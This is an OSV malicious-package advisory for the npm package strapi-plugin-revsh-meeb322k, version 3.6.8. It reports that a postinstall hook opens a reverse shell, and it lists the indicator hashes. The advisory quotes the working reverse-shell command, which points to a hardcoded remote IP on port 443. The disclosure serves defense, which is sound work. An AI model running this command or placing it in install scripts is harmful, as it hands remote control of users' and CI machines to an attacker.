MAL-2026-16187

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-revsh-meeb322k/MAL-2026-16187.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16187
Published
2026-09-15T15:54:22Z
Modified
2026-09-15T16:31:25Z
Summary
Malicious code in strapi-plugin-revsh-meeb322k (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d6d4e28da86ccc1cb11bae22a247171657c958b6bf24b8bf4541bb08970c969b)

package.json declares scripts.postinstall = "node postinstall.js", causing postinstall.js to run automatically on npm install. That file executes bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1', opening an interactive bash session from the installer's machine to the hardcoded remote host 14.225.210.85 on TCP/443. There is no authentication, consent prompt, or documented disclosure of this behavior; the payload runs on every install, including CI systems.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020057",
            "import_time": "2026-09-15T16:19:15.033717962Z",
            "modified_time": "2026-09-15T15:54:22Z",
            "sha256": "d6d4e28da86ccc1cb11bae22a247171657c958b6bf24b8bf4541bb08970c969b",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-revsh-meeb322k

Package

Name
strapi-plugin-revsh-meeb322k
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-revsh-meeb322k

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "dfa7478eb73161feed4ab606f488ee08eda7efe631fb5fc3b1a78367d4f52ad4",
            "tlsh": "ae11cb4166f9673562338ddde60b942ba3474e05703ae517b98c03171ec6c8cc5426fd"
        },
        {
            "path": "package.json",
            "sha256": "6d08e9965d7eae9204eec509c0879e64e785b9131e52546edd5d06ad8b8e13f2",
            "tlsh": "34d0a7108a119333bdc4569c1823814bab719d0f1445f82d27f71188424bbbb987f36f"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-revsh-meeb322k-3.6.8.tgz",
            "hashes": {
                "sha1": "721cb15f070319cc28cf00ee53069d3827b9b5b6",
                "sha512_sri": "sha512-0fGo36LPsmIEUkRVxDLumXpAwFheyf0KO3bUtPKbuO48yiHu6GvaSMd0UxFPsSocRhlOZJRzyeNEc75r1IfgZA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-revsh-meeb322k/MAL-2026-16187.json"